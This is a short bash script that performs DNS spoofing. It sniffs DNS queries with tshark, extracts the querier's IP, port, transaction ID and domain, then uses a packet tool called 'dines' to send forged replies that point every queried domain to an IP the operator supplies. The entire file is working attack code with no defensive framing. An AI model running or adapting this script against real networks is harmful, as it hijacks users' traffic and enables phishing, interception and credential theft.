#!/bin/bash

if [ "$1" == "" ];then
    echo "Usage: $0 <ip to give>"
    exit
fi

while true
do
    tshark -V port 53 -c 1 > pkt 2> /dev/null
    IP=`cat pkt | grep "Internet Protocol" | cut -d " " -f 4`
    UDP_PORT=`cat pkt | grep "Source port" | cut -d " " -f 7`
    TRID_HEX=`cat pkt | grep Transaction | cut -d " " -f 7 | cut -d x -f 2 | sed -e 's/\(.\{2\}\)\(.\{2\}\)/\2\1/'`
    TRID=`echo $(( 16#$TRID_HEX ))`
    DOMAIN=`cat pkt | grep type | grep class | cut -d " " -f 9 | cut -d ":" -f 1`
    ./dines --dst-ip $IP --sport 53 --dport $UDP_PORT --trid $TRID \
       --question $DOMAIN,1,1 \
       --answer $DOMAIN,1,1,60,$1
done
